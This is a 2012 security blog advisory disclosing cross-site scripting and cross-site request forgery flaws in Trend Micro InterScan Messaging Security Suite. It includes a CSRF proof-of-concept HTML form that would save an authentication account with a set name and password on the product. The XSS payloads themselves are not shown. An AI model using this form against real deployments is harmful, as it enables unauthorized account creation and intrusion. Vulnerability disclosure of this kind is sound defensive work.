Trend Micro InterScan Messaging Security Suite: Multiple Vulnerabilities - Spentera Blog

Trend Micro InterScan Messaging Security Suite: Multiple Vulnerabilities

by modpr0be / September 14, 2012

We discovered that Trend Micro InterScan Messaging Security Suite is vulnerable to Cross Site Scripting and Cross-site Request Forgery.

Proof of Concept

The vulnerabilities POC are as follow:

Cross-site Scripting (CVE-2012-2995) (CWE-79)

Persistent/Stored XSS
Non-persistent/Reflected XSS
Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)
  <form action="hxxps://" method="POST">
   <input type="hidden" name="enabled" value="on" />
   <input type="hidden" name="authMethod" value="1" />
   <input type="hidden" name="name" value="quorra" />
   <input type="hidden" name="password" value="quorra.123" />
   <input type="hidden" name="confirmPwd" value="quorra.123" />
   <input type="hidden" name="tabAction" value="saveAuth" />
   <input type="hidden" name="gotoTab" value="saveAll" />
   <input type="submit" value="CSRF" />


Currently, we are not aware of any solution from the vendor. You may contact them for patch or update of the product. As a temporary solution, you may restrict access to this application to prevent unauthorized user from making use of this vulnerability.


Leave a Comments

Your email address will not be published. Required fields are marked *